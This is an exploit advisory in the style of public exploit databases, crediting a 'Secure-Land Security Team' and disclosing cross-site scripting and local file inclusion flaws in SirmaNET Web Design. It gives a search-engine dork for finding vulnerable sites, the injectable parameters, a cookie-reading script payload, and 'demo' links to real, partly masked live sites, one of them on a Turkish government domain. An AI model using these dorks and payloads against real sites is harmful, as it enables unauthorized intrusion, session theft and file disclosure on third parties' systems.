########################################################################################
# #
# Exploit Title : SirmaNET Web Design Multiple Vulnerabilities #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Vendor : www.sirmanet.com #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : inurl:"index.php?sayfa=altmenu.php" #
# #
# #
########################################################################################
# #
# [XSS]: #
# #
# http://[TarGeT]/index.php?sayfa=altmenu.php&ustmenu=[XSS] #
# http://[TarGeT]/index.php?sayfa=altmenu.php&baslik1=[XSS] #
# #
# ~xss : #
# #
# ><script >alert(document.cookie)</script> #
# #
# [LFI] : #
# #
# http://[TarGeT]/index.php?sayfa=[LFI] #
# #
# #
# Demo : #
# #
# http://basakxxir.meb.gov.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS] #
# http://www.yigitxxlakfinans.com/index.php?sayfa=altmenu.php&baslik1=[XSS] #
# http://www.germxxica.com.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS] #
# www.yigitemlakfixxns.com/index.php?sayfa=[LFI] #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################